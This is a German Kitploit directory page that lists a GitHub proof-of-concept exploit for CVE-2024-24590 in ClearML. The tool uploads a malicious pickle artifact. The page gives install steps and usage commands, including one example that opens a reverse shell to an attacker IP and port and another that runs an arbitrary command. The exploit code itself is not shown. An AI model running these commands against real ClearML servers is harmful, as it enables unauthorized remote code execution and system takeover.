Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-24590-ClearML-RCE-CMD-POC — CVE-2024-24590 ClearML RCE&CMD POC | Kitploit
Tools/GitHubGitHub/diegogarciayala/cve-2024-24590-clearml-rce-cmd-poc
Payload-GenerierungSchwachstellenanalyseExploitationCommand and ControlLieferkettensicherheitRemote-Access-Tool
GitHubdiegogarciayala/cve-2024-24590-clearml-rce-cmd-poc

CVE-2024-24590-ClearML-RCE-CMD-POC

CVE-2024-24590 ClearML RCE&CMD POC

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
91vor 2 JahrenNoch nicht geprüft

ClearML-Exploit-Skript

Dieses Repository enthält ein Python-Exploit-Skript für CVE-2024-24590. Das Skript ist dafür ausgelegt, eine bösartige Pickle-Datei in ClearML hochzuladen, die eine Reverse-Shell oder einen benutzerdefinierten Befehl auf dem Zielsystem ausführt.

Funktionen

  • Lädt ein bösartiges Pickle-Artefakt in ClearML hoch.
  • Führt eine Reverse-Shell oder einen benutzerdefinierten Befehl auf dem Zielsystem aus.
  • Unterstützt benutzerdefinierte Projekt- und Aufgabenamen.
  • Ermöglicht das Setzen eines Tags auf die Aufgabe.

Verwendung

Voraussetzungen

  • Python 3.x
  • ClearML SDK
  • argparse (normalerweise in Python enthalten)

Installation

  1. Repository klonen:

    root@kitploit:~
    git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
    cd CVE-2024-24590-ClearML-RCE-CMD-POC
    
  2. ClearML SDK installieren:

    root@kitploit:~
    pip install clearml
    clearml-init
    

Skript ausführen

Das Skript unterstützt zwei Betriebsmodi: default und cmd.

Standardmodus

In diesem Modus müssen Sie die IP-Adresse und den Port des Angreifers angeben, um eine Reverse-Shell herzustellen.

root@kitploit:~
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>

CMD-Modus

In diesem Modus können Sie einen benutzerdefinierten Befehl angeben, der ausgeführt wird.

root@kitploit:~
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"

Beispiele

root@kitploit:~
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
root@kitploit:~
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"

whoami

  • HackTheBox: sl4sh1t0
  • Telegram: sl4sh1t0
  • X (Twitter): @diegogarciayala

Credits

https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

Tool herunterladen